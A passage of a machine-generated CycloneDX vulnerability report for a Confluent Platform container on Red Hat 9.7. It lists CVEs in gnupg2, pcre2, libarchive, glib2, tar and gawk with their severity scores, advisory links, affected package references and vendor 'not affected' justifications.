        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java runtime that executes Confluent Platform is not linked against the vulnerable system library. That ensures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2022-3219",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-3219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-3219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010"
        },
        {
          "url": "https://dev.gnupg.org/D556"
        },
        {
          "url": "https://dev.gnupg.org/T5993"
        },
        {
          "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230324-0001/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
        }
      ],
      "published": "2023-02-23T20:15:12+00:00",
      "updated": "2025-03-12T21:15:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2022-41409",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-41409"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-41409"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/issues/141"
        },
        {
          "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
        }
      ],
      "published": "2023-07-18T14:15:12+00:00",
      "updated": "2024-11-21T07:23:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-30571",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        }
      ],
      "cwes": [
        362
      ],
      "description": "Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-30571"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-30571"
        },
        {
          "url": "https://access.redhat.com/solutions/7033331"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/1876"
        },
        {
          "url": "https://groups.google.com/g/libarchive-announce"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30571"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
        }
      ],
      "published": "2023-05-29T20:15:09+00:00",
      "updated": "2025-01-14T17:15:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2023-32636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32636"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841"
        },
        {
          "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231110-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2024-11-21T08:03:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-39804",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-39804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-39804"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
        }
      ],
      "published": "2024-03-27T04:15:08+00:00",
      "updated": "2025-11-04T19:15:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.34-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-4156",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-4156"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-4156"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930"
        },
        {
          "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6373-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
        }
      ],
      "published": "2023-09-25T18:15:11+00:00",
      "updated": "2024-11-21T08:34:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "5.1.0-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
